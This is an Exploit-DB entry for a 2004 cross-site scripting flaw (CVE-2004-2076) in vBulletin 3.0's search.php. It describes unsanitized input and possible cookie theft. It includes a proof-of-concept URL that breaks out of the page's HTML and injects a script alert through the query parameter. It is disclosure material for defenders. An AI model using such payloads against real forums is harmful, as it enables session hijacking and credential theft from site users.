VBulletin 3.0 - Search.PHP Cross-Site Scripting Vulnerability

ID EDB-ID:23691
Type exploitdb
Reporter Rafel Ivgi The-Insider
Modified 2004-02-13T00:00:00


VBulletin 3.0 Search.PHP Cross-Site Scripting Vulnerability. CVE-2004-2076. Webapps exploit for php platform

                                            source: http://www.securityfocus.com/bid/9656/info

It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'search.php' script. This issue is reportedly due to a failure to sanitize user input and so allow HTML and script code that may facilitate cross-site scripting attacks. Successful exploitation of this issue may allow for theft of cookie-based authentication credentials or other attacks.

http://www.example.com/forum/search.php?do=process&showposts=0&query=<!-- / main error message --></p></p></blockquote>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('XSS')</script><plaintext>